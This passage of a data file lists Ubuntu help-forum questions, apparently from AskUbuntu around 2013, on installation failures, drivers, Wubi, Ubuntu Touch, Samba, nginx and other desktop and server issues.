1 ath9k psmouse 95595 0 serio_raw 13216 0 ath9k_common 14056 1 ath9k ath9k_hw 395307 2 ath9k , ath9k_common ath 23828 3 ath9k , ath9k_common , ath9k_hw rts5139 356200 0 uvcvideo 76750 0 videobuf2_core 32852 1 uvcvideo videodev 120310 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc i915 520615 3 ath3k 12919 0 btusb 22475 0 bluetooth 209249 13 bnep , rfcomm , ath3k , btusb drm_kms_helper 49113 1 i915 drm 288721 4 i915 , drm_kms_helper i2c_algo_bit 13414 1 i915 mei 40691 0 cfg80211 206797 3 ath9k , mac80211 , ath video 19391 1 i915 lpc_ich 17062 0 soundcore 15048 1 snd snd_page_alloc 18485 2 snd_hda_intel , snd_pcm lp 17760 0 parport 46346 3 parport_pc , ppdev , lp hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid r8169 61651 0 command : lsb_release -rcd result : description : ubuntu 12.10 release : 12.10 codename : quantal
259981	apt-get autoremove wants to remove linux headers	today i ran apt-get autoremove to remove un-needed packages and it wants to remove linux-headers-3.2.0-37 and linux-headers-3.2.0-37-generic reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libglademm-2.4-1c2a linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic ttf-umefont ttf-unfonts-core 0 upgraded , 0 newly installed , 5 to remove and 0 not upgraded . after this operation , 67.6 mb disk space will be freed . do you want to continue [ y/n ] ? is it safe to remove these ? my installed kernel is a newer version than the headers that autoremove lists . uname -r 3.2.0-38-generic
259985	how do you package html applications for ubuntu touch ?	gomobile talks about html5 applications but does n't explain how to package or install them on ubuntu phone/touch . is the `` unity webapps '' stuff webapps the same for ubuntu touch ? ( api documentation here appears to be missing . ) or are there any differences we should be aware of ? thanks !
259986	how does ubuntu touch work when `` docked '' with keyboard/mouse/monitor ?	is ubuntu touch for phones and tablets meant to be `` dockable '' with an external keyboard/mouse/monitor ? if so , how will the touch gestures for navigation be handled when using a mouse or trackpad ? will applications need to be able to handle migrating across different screen resolutions while running , etc ?
259990	will `` legacy '' linux/x11 apps run on ubuntu touch ?	i 've been doing a little testing of the ubuntu touch preview on my nexus 10 tablet . it 's very pretty , but i 'm curious what support is planned for `` legacy '' linux/x11 apps that are n't based on qt/qml ? will traditional desktop applications like libreoffice and gimp be runnable on the tablet view ? or will they run in a dedicated x11 desktop app ? or only when docked ? or will they be supported at all ?
259991	what size cd to burn ubuntu 12.04	need recommendation on what cd to use to burn ubuntu 12.04 . i have 80 minute , 700mb discs , but i would get another size if it would make process easier . thanks .
259997	how safe is it to shrink the root ( ext4 ) partition ?	note : i 'm not asking how . i 've found nice tutorials on how to do this and will try it myself and i 'll dig some more or ask questions about it after my first attempt . background : i installed ubuntu 12.04 lts on my machine to dual boot with windows 8 . it 's a thinkpad machine so the disk is pre-partitioned for recovery and other stuff . i decided to do assign the mount points to the different partitions myself . stupidly , a friend of mine suggested to use one partition to mount / and /boot ( swap is on a different partition of course ! ! ) . so after doing some reading , it 's clearly safer to have the two mount points on two separate partitions . i 've decided to separate them and put /booton a different partition . the thing is , i do n't think i have unallocated space nor a free partition on my disk right now . finally : so my question is : how safe is it to shrink the root partition to have some unallocated space on my disk , and use that space as a dedicated partition for /boot ? thanks in advance .
260006	+30 sites using 1gb ram on nginx	i have a lemp setup ( ubuntu 12.04 , nginx , mysql , php 5.3 and apc ) and i have 30 sites hosted on it . they all are wordpress sites . it uses about 1gb ram . is this normal ? i thought nginx would use less ram than apache would . each site only receive about 200 hits daily this is the top top - 04:46:39 up 12:27 , 1 user , load average : 0.00 , 0.03 , 0.00 tasks : 40 total , 1 running , 39 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.0 % us , 0.0 % sy , 0.0 % ni,100.0 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 4194304k total , 788356k used , 3405948k free , 0k buffers swap : 0k total , 0k used , 0k free , 0k cached pid user pr ni virt res shr s % cpu % mem time+ command 1 root 15 0 2496 1404 1168 s 0 0.0 0:00.29 init 1179 root 15 0 2328 896 712 s 0 0.0 0:00.00 cron 1241 mysql 15 0 158m 48m 5968 s 0 1.2 5:33.31 mysqld 1271 syslog 15 0 2456 1216 548 s 0 0.0 0:00.06 syslogd 1320 root 18 0 5496 2124 1712 s 0 0.1 0:00.00 sshd 1341 root 25 0 5832 1736 292 s 0 0.0 0:00.00 nginx 1342 www-data 18 0 6300 2892 892 s 0 0.1 0:02.54 nginx 1343 www-data 18 0 6332 2840 884 s 0 0.1 0:02.48 nginx 1345 www-data 18 0 6300 2840 884 s 0 0.1 0:02.39 nginx 1347 www-data 15 0 6300 2848 892 s 0 0.1 0:01.98 nginx 1349 root 18 0 539m 4252 1452 s 0 0.1 0:00.01 php-fpm 1441 root 17 0 5764 1760 1404 s 0 0.0 0:00.03 master 1449 postfix 18 0 5916 1868 1472 s 0 0.0 0:00.02 qmgr 1455 snmp 18 0 8688 3772 2160 s 0 0.1 0:00.04 snmpd 1504 root 23 0 2448 876 700 s 0 0.0 0:00.00 xinetd 3144 root 18 0 4360 1332 996 s 0 0.0 0:00.08 ntpd 5708 www-data 16 0 554m 125m 108m s 0 3.1 0:03.50 php-fpm 5709 www-data 15 0 553m 118m 101m s 0 2.9 0:02.51 php-fpm 5710 www-data 15 0 559m 134m 110m s 0 3.3 0:03.25 php-fpm 5711 www-data 15 0 548m 103m 90m s 0 2.5 0:02.39 php-fpm 5712 www-data 15 0 543m 117m 110m s 0 2.9 0:02.86 php-fpm 5713 www-data 15 0 542m 93m 87m s 0 2.3 0:02.16 php-fpm 5714 www-data 15 0 546m 108m 99m s 0 2.7 0:01.88 php-fpm 5715 www-data 15 0 559m 92m 69m s 0 2.3 0:02.29 php-fpm 5720 www-data 15 0 555m 128m 110m s 0 3.1 0:03.24 php-fpm 5721 www-data 16 0 542m 101m 95m s 0 2.5 0:03.63 php-fpm 5722 www-data 15 0 548m 101m 89m s 0 2.5 0:02.81 php-fpm 5723 www-data 15 0 556m 94m 74m s 0 2.3 0:02.96 php-fpm 5726 www-data 15 0 554m 93m 75m s 0 2.3 0:03.43 php-fpm 5727 www-data 15 0 542m 93m 87m s 0 2.3 0:02.03 php-fpm 5728 www-data 15 0 546m 97m 87m s 0 2.4 0:03.56 php-fpm 5729 www-data 15 0 552m 131m 115m s 0 3.2 0:02.40 php-fpm 5751 www-data 16 0 544m 91m 83m s 0 2.2 0:02.29 php-fpm 5752 www-data 15 0 547m 104m 93m s 0 2.6 0:02.85 php-fpm 5753 www-data 15 0 556m 110m 90m s 0 2.7 0:01.59 php-fpm 5754 www-data 15 0 549m 94m 81m s 0 2.3 0:01.97 php-fpm 5796 postfix 18 0 5780 1676 1340 s 0 0.0 0:00.00 pickup 5797 root 15 0 8304 2796 2224 s 0 0.1 0:00.05 sshd 5808 root 18 0 3136 1784 1320 s 0 0.0 0:00.00 bash 5819 root 18 0 2368 1112 892 r 0 0.0 0:00.00 top
260008	problem with nautilus when using awesome ?	when i start awesome with startx i have no background ( by choice ) and when i right click on the `` desktop '' i get a menu for opening apps like in normal gnome . the problem is that when i start nautilus it basically starts unity 's desktop with the default ubuntu background and the right-click menu from the unity desktop how can i stop this from happening ?
260016	using the home landline throught ubuntu - is it possible ?	say i have a usb fax modem on my laptop..and i connect it to my home telephone landline , is there an option to receive and send calls through ubuntu , using said line ?
260017	nvidia x driver fails to install	my laptop is the acer timeline ultra m5-481tg . it has an nvidia geforce gt 640m le gpu . i am running ubuntu studio 12.10 . i have tried to install this driver many ways because nouveau eats my battery and i believe is somewhat out of date . i have even tried using sudo stop lightdm in another console . i have tried nvidia-current , nvidia-current-updates , nvidia-experimental-310 , and the .run file of their website . every time i open nvidia-settings it tells me to run the nvidia-xconfig ' as root then restart x. i tried this both in x and with x stopped in an alternate console . i have also installed bumblebee and that did nothing to get the nvidia x driver running . i installed jockey-common as well and enabled these drivers using it , but again to no avail . when i run nvidia-xconfig it does create the necessary changes to the config file , but these do n't result in it actually running or resolving the error . i have read very many articles and tried so many things . i.e . sudo apt-add-repository ppa : xorg-edgers/ppa and of course apt-get update , apt-get upgrade , and apt-get dist-upgrade . i have purged and reinstalled everything in numerous ways looking for just the right combination , no luck thus far . this has eaten hours of my time ! please help and thanks ! edit : sudo apt-get remove nvidia-common nvidia-current nvidia-settings & & sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get dist-upgrade & & sudo apt-get install nvidia-common nvidia-current nvidia-settings & & sudo jockey-text -e kmod : nvidia_current & & sudo nvidia-xconfig & & sudo restart lightdm i made a `` meta '' -command for lulz and to give it one last shot . still no luck .
260022	how do i save a libreoffice calc file for opening in excel ?	i am trying to save a file in libreoffice calc that is still usable in microsoft office excel . save as .xlms does n't work .
260024	how do i change scroll wheel sensitivity in xubuntu 12.10 64-bit ?	exactly what it says on the tin . googled , sifted through a few results from 2+ years ago , and no luck . this is a serious pain to my right index finger . i 'm using chromium , and it scrolls about three lines per click .
260025	how do i unallocate a node within maas	i 'm driving myself somewhat crazy trying to figure out how to remove a deployed node . i ca n't find the information anywhere . what are the steps to remove a node from the cluster after it 's been allocated to a user ? edit : i should also note that i did not have juju installed . it 's just deployed to my user accound via the magic of the web interface .
260026	virtualbox machine will not boot up after maas commisioning	question : has anyone ever had a problem with a virtualbox machine not booting up after it 's been commissioned and allocated to admin on maas ? description : i was able to commision a virtualbox machine on my maas and the ubuntu-12.04-precise image get installed but when i boot up the virtual machine , i get an boot error . see image below . thanks .
260039	an open program moves before pinned programs on unity launcher	i have several programs that i use frequently and pin to the unity launcher . i switch to them by using the winkey+number . sometimes an open program that i am running that is n't pinned moves on top of a pinned program , thus rearranging the numbers . anyway to stop it ? i am running 12.04 lts .
260042	dsl through pppoeconf works but through network manager stops some sites from loading in browsers ?	i am having ubuntu 12.04 . dsl through pppoeconf ( connecting at boot time ) works without any problem but connecting through network manager stops some sites from ( fully ) loading in browsers ? disabling dnsmasq by commenting dns=dsnmasq line in /etc/networkmanager/neworkmanager.conf is not solving the problem.. thanks in advance .
260045	i ca n't use opendns in my ubuntu desktop	i wanted to use open dns solution in my ubuntu pc . also i followed the instruction from https : //store.opendns.com/setup/operatingsystem/ubuntu but it 's still saying i am not using open dns that means configuration was wrong . but i ca n't understand what 's wrong . my ubuntu version : ubuntu 12.04 lts output of sudo /etc/resolv.conf + output of sudo vim /etc/dhcp/dhclient.conf + output of sudo ifconfig can be found here : http : //paste.ubuntu.com/5557006/ it would be great if anyone can see my problem and suggest me to do right things .
260049	ubuntu mobile sdk on oneiric	when i try to install ubuntu mobile sdk on 11.10 , updating repositoeis gives 404 that libs do not exists in /oneiric/ w : failed to fetch htt : //ppa launchpad.net*canonical-qt5-edgers/qt5-proper/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch ht p : //ppa launchpad.net*canonical-qt5-edgers/qt5-proper/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch htt : //ppa.launchpad.net*canonical-qt5-edgers/qt5-proper/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http /ppa.launchpad net*ubuntu-sdk-team/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http /ppa.launchpad net*ubuntu-sdk-team/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net*ubuntu-sdk-team/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http ppa.launchpad net*ui-toolkit/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http ppa.launchpad net*ui-toolkit/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch htt ppa.launchpad net*ui-toolkit/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . first of all , can the sdk and its component be installed on 11.10 or i need 12.04 or 12.10 ? thank you .
260052	wubi after upgrading windows 7 to windows 8	i 've seen a lot of questions about ubuntu and windows 8 on a new machine with windows 8 pre-installed and that uefi stuff , but nothing useful about upgrading from win7 to win8 and ubuntu . i have a win7 machine ( no uefi firmware ) with a wubi installation of 64-bit ubuntu 12.10 and am looking to simply upgrade from win7 to win8 . will this have serious complications with my current set up , like with the pre-installed win8 machines ? will my ubuntu install be lost in the win8 upgrade ? thanks !
260053	when i try to install ubuntu my computer freezes then shuts down	it 's a really old computer that i had lying around and windows got corrupted so i tried installing ubuntu but it freezes and shuts down after 10 minutes . i manage to start booting off my usb but when i click install ubuntu it freezes and shuts down .
260058	i 'm dual booting win7 and ubuntu12.10 and ubuntu thinks there 's no space on the hard drive	i 'm dual booting win7 home premium and ubuntu 12.10 32bit ( the machine is 64bit , intel celeron ) , and if i check the c : \ drive with win7 , it shows about 90 gb remaining . i 'm new to ubuntu , and recently ubuntu said that only about 800 mb was left on the hard drive . how do i expand the amount of space ubuntu takes up on the hard drive so that it does n't run out of space ? this is a wubi install . -many thanks in advance !
260059	run without monitor in 12.10	yes i know this question is out there but none of the answers work for me like the ones found here and here . i have ubuntu version 12.10 32bit . it 's a fresh install . only software installed is teamviewer 8 . i 'm trying to setup this computer so i can remotely access it but ubuntu does n't like to boot up without a monitor . i 've tried a couple xorg.conf edits . none of them work and i 'm forced to do a reinstall of ubuntu to fix what i messed up . i have an old , almost 15 year old pc . it has an asus m2n-mx se plus motherboard . i believe the integrated video is something like an nvidia geforce 6100 .
260060	trouble with installing ubuntu 12.10 from usb	i have recently built my own pc and i want to use ubuntu as my os , but when i try to boot ubuntu up using my usb i get an error saying : no default ui configuration directive found i have tried to rename the os linux files , but that did not appear to work . ( but i may have been doing it completely wrong . ) i 'm running an amd machine if that helps .
260063	only one user can connect to ubuntu samba server	i setup a samba server on 12.04 lts , and it works great for one user but not the others . i am trying to map a network drive from a windows 7 laptop . i can successfully authenticate with one user , but the other two both get `` access is denied '' errors . here is my smb.conf file . [ global ] server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers [ share ] comment = ubuntu file server share path = /srv/share read only = no create mask = 0755 i know that the service is successfully reading from the /etc/passwd file because if i change the linux password for the user that works , i have to use the new password when i connect . i changed all the users so they are all members of the same groups ( all three users are admins anyway ) . i only ever have one user connected at a time . here are the permissions on the shared folder /srv $ ls -l drwxrwxrwx 1 nobody nogroup 16 feb 22 17:05 share any ideas ?
260064	can i install/run ubuntu 12.10 on my laptop ( acer 5755g ) ?	i currently have a acer 5755g running windows 8 and specs are as follows : intel core i5-2430m nvidia geforce gt540m 1gb vram 8gb ram 750gb hdd it also has intel graphics card , so is it possible to use both of them at the same time as i am right now ? also will everything work properly , like the wifi , bluetooth , functions keys etc . also is ubuntu high on resources , because i dont want my laptop to die too fast . thanks any help appreciated .
260068	how can i prevent software from becoming default ?	i recently installed smplayer and it became default without even asking , is there a way to prevent software doing this ?
260069	wireless authentication pop-up greyed out	the problem frequently i get online without being asked to input a password , and then , after several minutes of having a connection , the connection stops and i am prompted for a password for the network . however , the username field and the connect button are greyed out , like in the picture . this is ... thoroughly irritating , to say the least . how can i fix it ? ( google and the search bar have failed me so far . ) details if i close the pop-up , it will reappear in a couple minutes . occasionally rebooting the computer will allow me to get back on the network . i 'm running ubuntu 12.04.2 lts . the networks seem fine ; my old mac laptop has no troubles connecting to the same networks in the same locations . this does n't happen consistently .
260070	can i install the ubuntu phone os in oracle virtualbox	i love the idea of the new ubuntu phone os and was wanting to try it out . unfortunately , i do n't have any extra galaxy or nexus sitting around my house . so , i was wondering if i could install the ubuntu phone os in oracle virtualbox or any of virtual machine software ?
260076	why will byobu only split into tabs using a terminal , and not do the same in a console/tty ?	i have used byobu for a bit and noticed something odd : i can split byobu into tabs normally when i am using a terminal emulator , but when i am in a console or tty , pressing shift-f2 only enters a tilde ( ~ ) and ctrl-f2 has no effect . is this a technical limitation ? if so , how does it work ?
260078	will the ubuntu tablet os be flash-able from zip files ?	is it available for nexus only now ? will it be available for other tablets as well in flash-able zip files ? just like custom rom for android flash from cwm twrp ?
260080	wifi access point ?	can i create wifi access point from ubuntu desktop 12.10 so as to connect my mobile it wo n't support ad-hoc network ? on windows it was done by connectify but i recently switched to ubuntu and i dont know how to create it ? i am using lan for internet .
260084	where can i download the ubuntu touch developer preview ?	hi where exactly is the download link for the preview ? all i can see to download is the factory firmware for the 4 devices but no actual download link for the preview .
260085	how to stop firewall	i am new to ubuntu . i am developer and working with maven3 . i am unable to download dependencies from this site . when i tried in windows it was a 404 exception but when i stopped my anti-virus it was working fine . i tried the same in ubuntu but still no luck . i have tried running sudo ufw disable but still no luck . please help me in solving this .
260087	trouble installing ubuntu 12.04	i recently got a toshiba c850 laptop to replace my old dell netbook . now due to the lack of a cd drive on my netbook i was required to use universal usb installer to install ubuntu 12.04 , that all went fine and worked flawlessly . but now that i have my new laptop i have run into many issues that i have never been faced with before in my previous installations while using my previous method.. at first i tried installing the 12.04 64-bit version of ubuntu provided on the website but during installation i was given the error `` /install/vmlinuz : file not found '' . after some searching and troubleshooting i decided to give up and resorted to trying to install the 32-bit version . but every time i selected to install ubuntu i would get a sharp beeping sound and nothing would happen . this has greatly annoyed me as i have i installed ubuntu 12.04 via usb on many computers of friends and family but have never run into this kind of error . any help on this subject would be greatly accepted . thanks
260091	wordpress installed but not opening the page	i have installed wordpress under /var/www/wordpress and when i try to access my site using mydomainname/wordpress/wp-admin , it downloads a file rather than opening anything . can anyone help . please . thanks
260094	how to remove unity and unity 2d and install kde in ubuntu 12.10 64 bit	how to remove unity and unity 2d and install kde in ubuntu 12.10 64 bit ? i want to install the latest kde .
260095	installing ubuntu using wubi	i have installed ubuntu on my windows 7 machine using wubi . after installation when i reboot the system it shows a gibberish screen . anaways , i turned off my system amd turned it on . when i choose 'ubuntu ' from system boot menu , it throws the below error : error : attempt to read outside of disk : loop ( 0,0 ) please advise . thanks , anutosh
260098	how do i change the gtk ( the gui ) theme in 12.10 ?	so i upgraded from 10.04 to 12.10 , and somehow changing gtk themes ( from ubuntu-tweak , gnome-tweak-tool etc ) ca n't seem to change the archaic-looking rendering in : into the selected theme . am i missing something ? update : another detail i forgot to mention is that i 'm using openbox as opposed to the normal window manager .
260100	problems connecting to the internet	recently , on my machine which was running windows 7 i installed ubuntu 12.10 using wubi.exe . everything else was ok , but problem started when i attempted to connect it to the net . after a bit of hacking around with the answers in this forum i could finally see the message on the top-right hand side- `` wired network-connected '' . but as soon as i open a browser , ( which is mozilla firefox in my case ) , i got an error saying -problem loading page . even though typing in `` nm-tool '' in the terminal gives me all the details that i set in manually and says connected . please help !
260106	how do i install from usb disk ?	i 've tried booting from my usb flash drive even after creating a bootable usb disk and several attempts to alter my bios into booting from the usb proved futile . also , when i tried the assisted installer in the ubuntu disk i still could n't get it to work usual reply is c : \ubuntu\winboot\wubildr.mbr not found error . i use a samsung np300e5c laptop . what do i do ?
260107	how do i set-up buttons and keys on my wacom tablet and stylus in gimp ?	i am running ubuntu 12.10 quantal , studio , 64 bit version . i do my photo editing in gimp 2.8.4 when , in gimp , i go to edit , preferences , input devices , configure extended input devices , i see for the stylus two dialogue boxes , `` axes '' numbered 1 to 6 for x , y , pressure ( with adjustable curve ) , x tilt , y tilt , and wheel . the second box , labelled keys , has 248 keys that can be changed to disabled , and other options somehow . i ca n't find an explanation or manual to explain what this all means ( my tablet , wacom create cth_670 , has only 6 expression keys , i.e. , 3 rocker switches with each having two possible positions , and the stylus has 2 buttons ) , or how to map functions to these 248 buttons . does anyone have a link or explanation on how to set up my tablet and stylus , specifically so i can map hot keys and functions to my tablet and pen ?
260108	galaxy nexus-adbd can not run as root in production builds	when pushing quantal-preinstalled-phablet-armhf.zip , i get an error message `` adbd can not run as root in production builds '' and the ubuntu flash fails .
260110	mouse touchpad not working	i just installed ubuntu in my newly bought acer aspire one 725 netbook , along with windows 7 as another os . whenever i try to work on ubuntu , my mouse touch pad does n't work , it works nicely in windows 7 , but not in ubuntu , i 've evb tried fn+f7 key combinition , but it wont help . what could be the problem and solution ?
260113	to upgrade from ubuntu 10.04 to ubuntu 12.10	i want to upgrade from ubuntu 10.04 to 12.10 i have setup of close to 40 machines hence want to do it off line . i have ubuntu 12.10 installation cd , but when i run the setup using cd the upgrade option is disabled . can somebody please help me in resolving this issue .
260115	which comes first , system proxy or vpn ?	if i used a vpn and a system proxy , how would the internet be accessed ? pc -- > proxy -- > vpn -- > internet -- or -- pc -- > vpn -- > proxy -- > internet
260118	webcam not working in acer laptop	i recently installed ubuntu 12.10 on my acer one aspire 756-967bckk laptop . but my webcam is not working . programs like cheese or skype ca n't detect my camera .
260120	framebuffer in ubuntu 12.04 ( nvidia )	after a new install of 64-bit ubuntu 12.04.2 , my grub menu appeared in a nice , small font in a framebuffer and when ubuntu loaded , the logo and red/white dots were small and crisp . i 've installed packages i need and fully updated the install ( but it 's still 12.04 , not 12.10 ) . now the grub framebuffer and the loading logo and in a large , blurry font . i 've read this answer , but i 'm not sure if it relates to what i am experiencing ... i do n't have nomodeset in /etc/default/grub . has an update changed my grub settings ? can i just uncomment this in my /etc/default/grub file : # grub_gfxmode=640x480 and set it to 1680x1050 ( 22 '' lcd native resolution ) and run update-grub to get back the nice framebuffer ?
260123	how to route vpn through proxy ?	i have an isp ( public hospital ) who is blocking everything through a program called fortiguard . it 's very annoying . its blocking my public library as a terrorist organization , my work email saying its considered social media , my computer support and coding sites under the category of `` hacking '' . however crackle , netflix , youtube , facebook , and pandora seem to work well . i 'm surprised these website are even working . vpn 's do n't work . changing the dns server does n't work . https does n't even keep me safe . the only thing which does work is tor . i would like to route all my system connections through a trusted exit node in tor . i figured the best way to do this was to create a vpn server with a hidden service address ( vps is limited in bandwidth ) in on my vps ( if they have n't blocked ssh ) . to do this i need to route everything through the tor proxy and then to the hidden service address via the vpn protocol . i 'm staying here for three more days and i would really love to give this hospital it a piece of my mind but to avoid confrontation i would much rather just cut the crap and bypass all this . long story short : is there a way to route vpn through proxy ? so the internet access will work like this : pc -- > proxy -- > vpn -- > internet
260124	how do i use wubi in a `` frozen disk '' environment ( aka computer labs )	i teach computer skills in a computer lab which uses a disk management system on to keep winxp in a know state between reboots . i 'd like to add a wubi installation , but i keep getting the same error the there 's no hibernation file . steps : unlock the drive install wubi and customize relock the drive choose to boot ubuntu receive error about ntfs partition not having a hibernation file . the management system is saming , which is on network card firmware and is chinese , so i do n't have details about how it works , but i assume that it sets the xp partition to look as if it is hibernated and then loads the hibernation file from memory or something similar . has anyone had experience with these types of systems and wubi ? are there any workarounds ?
260125	is there a password manager for ubuntu	what is the most popular open source password manager which i can use on a ubuntu machine or preferably across ubuntu/windows machines with some form of data compatibility . if there is a free web based version , that would be even more preferable .
260130	problem installing software from ubuntu software center and error running sudo app-get update and install commands	i am new to ubuntu . i am getting an error whenever i try to run sudo apt-get update ( 407 proxy authentication required ) . moreover , i am unable to install any software from ubuntu software centre not even using sudo apt-get install . i have tried every answers mentioned in the related questions here but none of them worked for me . when i try to play any audio file i am getting following error : required plugin could not be found python ( v2.7 ) required to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder for this when i try to run : sudo apt-get install ubuntu-restricted-extras , again i am getting error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-restricted-extras i have been trying this since the last 2-3 days with no fruitful result .
260131	only wallpaper and cursor showing	i searched through a lot of forums and googled in general , but i just ca n't find the answer . so i will ask here , and am a hopeful of a solution from you folks . new to linux and all that , but pretty familiar with computers . installed 12.10 on an old dell dimension 3000 desktop . installation was slow but completed without problems . after reading around a bit , i am nearly positive that this must have something to do with the video drivers , but again , i have not seen anyone with exactly similar nature to my situation that has a valid solution . after logging in , i am left with the wallpaper and a functioning cursor- nothing more . i am able to open a terminal with the hotkey ctrl+alt+t , and able to exit the gui straight to command interface with ctrl+alt+f1 . even after multiple updates , downloads , installs and even reinstallation , i am stuck . anyone able to shed some light ? please ask for any necessary specifications .
260138	will installing ubuntu wipe my windows applications off ?	if i have microsoft office installed on my windows 8 laptop , will installing ubuntu os wipe microsoft office and my other apps ?
260141	compiz and unity crash after amd drivers installed	i 'm a new linux user . i recently installed amd drivers from software center . when i restarted my machine , the normal login screen with the top menu bar appeared but after login i only have my wallpaper with no launcher and the top menu bar . i have hp dv6-6150ew laptop with intel/amd hybrid cpu ( intel hd3000/radeon 6770hd ) and i must install drivers because without them my laptop is overheating and it shuts down . any advice what i can do ?
260142	how can i discover and install a list of dependent libraries ?	i 'm trying to get the humble bundle version of dungeon defenders going , but the executable crashes with a `` no such file or directory '' error . thanks to this answer i 'm able to identify the dependent libraries required : $ objdump -x ./udkgame/binaries/dungeondefenders-x86 | grep needed needed libpthread.so.0 needed libgl.so.1 needed libsdl2-2.0.so.0 needed libopenal.so.1 needed libstdc++.so.6 needed libm.so.6 needed libgcc_s.so.1 needed libc.so.6 needed libdl.so.2 i started searching for targets with aptitude , but wondered if there 's a convenient way to install all these dependent libraries , rather than manually doing them one by one ? notes : running xubuntu 12.10 64-bit . other questions about fixing dependencies seem to assume that you 're trying to install something with apt-get or the software manager . i just downloaded the dungeon defenders tar file and tried to run it . edit : wondering if i asked the wrong question . maybe what i need to know is : how do you map a library name to the corresponding package/target name ?
260144	mouse double click and ctrl+a not working	i have installed ubuntu 12.04 , and worked fine until i updated some packages it suggested in the update manager after which the double click and ctrl+a are not working . does any body know the reason of the problem and how to solve it ?
260146	are usc applications allowed to install .desktop files ?	ubuntu 's official site for developers says : technical requirements : in order for your application to be distributed in the software centre it must : be in one , self-contained directory when installed be able to be installed into the /opt/ < package-name > directory ( * ) be executable by all users from the /opt/ < package-name > directory ( ** ) write all configuration settings to ~/.config/ < package-name > ( this can be one file or a directory containing multiple configuration files ) but what about .desktop files and icons ? what about symlinks from /usr/bin ? are these allowed ?
260149	logitech g700 not scrolling	i have just installed ubuntu 12.04 in a virtual machine ( virtual box running on windows 7 ) . but i have a problem using my logitech g700 mouse . if i use the scroll-wheel nothing happens , but i can click the scroll wheel , e.g . to close tabs in firefox . even the thumb-buttons work to go forward and backward in the browser . i have installed lomoco . lomoco -s says : 001.002 : 80ee:0021 not a logitech device 001.001 : 1d6b:0001 not a logitech device vboxguestadditions are installed . ( i have tried removing and reinstalling but with no change ) i have no idea hopefully someone can help . thanks .
260151	is `` install alongside windows '' the same as wubi ?	when installing ubuntu from a livecd on a windows system , the following options are available : install ubuntu alongside windows xp/vista/7/8 replace windows with ubuntu other is `` install ubuntu alongside windows '' the same as wubi or is it a real dual boot ? edit : i seem to have caused some confusion , i am not asking what the difference is between a wubi install and a regular dual-boot install , i am asking if the `` install ubuntu alongside windows '' option creates a wubi install or a regular dual-boot one .
260153	unable to unlock the nexus 4 device	i am unable to unlock the nexus 4 device . when i type sudo fastboot oem unlock and hit enter , it says : sudo : fastboot : command not found could you please help in fixing this issue ?
260157	problem when installing ubuntu studio 12.10	i 've used unetbootin for install ubuntu studio 12.10 on my usb drive . when boots , i choose to install ubuntu studio but after a step , it gave me this error : e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . how can i resolve ? on the computer there 's not any file . after the install crash , it goes to the try of ubuntu studio . another thing i have noticed is that i ca n't install any packages .
260164	why am i getting weird glitchy buttons and text ?	as you can see from the picture , i just installed ubuntu on my system and i am getting some strange glitchy graphics . this also happens in the password field on login . any ideas what this could be and how i can fix it ? it does n't happen when running other desktop enviroments like gnome .
260168	issues intalling ubuntu 12.04on sony vaio vgn fe780g	i 'm having an issue with ubuntu 12.04 .i have sony vaio vgn fe780g 2g ram intel video card and this is firsttime i am dealing with llinux ... first time i did put cd in and went with just ubuntu no windows.. it went well all the way to the end or point where i have to put name and password.. and then black screen ... .i rebooted my laptop and i got into desktop but i could n't do anything on bit so i 've decided to reinstall and now nothing runs first screen when you put cd in and black screen after that ... at some point it did show some commands running and then stops and that 's it ... some help would be appreciated
260171	ubuntu tablet interface structure	answer : i currently have all of the ubuntu touch apps working on my dell xps 12 and although unstable , unity 8 works well too . so i 'd accept that all of the tablet features will be working in due course . so while there is no actual 'image ' the relevant packages seem to have been packaged and ready for a machine running normal ubuntu . edit/clarification : i do n't think that this a duplicate of the other question . i 'm not asking whether i can run it on my laptop specifically , or what specific hardware will work . i 'm asking about its compatibility with the desktop environment and whether the two could be run side by side on some type of hybrid machine . switching between the two depending on the mode of the hybrid . so i understand now that qml is the main language used on the touch interfaces . so there is no correspondence between running a qml application in the desktop environment , in a similar way to how you could run a kde/qt app in a gnome environment ? original : please could someone explain a bit more for me on the tablet interface . i 've googled around but have n't had much luck . my initial understanding was that the tablet interface would be like a new interpretation of unity , but running on the same basic system ( with power and driver tweaks etc ) . with this understanding , would it be likely to find some way to install this tablet interface over the standard desktop interface ? in my case , i have a dell xps12 hybrid - laptop with a screen that rotates and turns into a tablet . the multitouch basics work . so i 'm less interested in the ideas of drivers , but more about the touch interface itself . i find the desktop interface perfect when i 'm in laptop mode , but very difficult in tablet mode . is there likely to be a system that allows me to switch between the two on my laptop ? specific answers about the xps12 are welcome , but generally i 'd like to know if i 'm fundamentally off the track on the idea of running the desktop and the tablet interfaces side by side on x86 . thanks in advance !
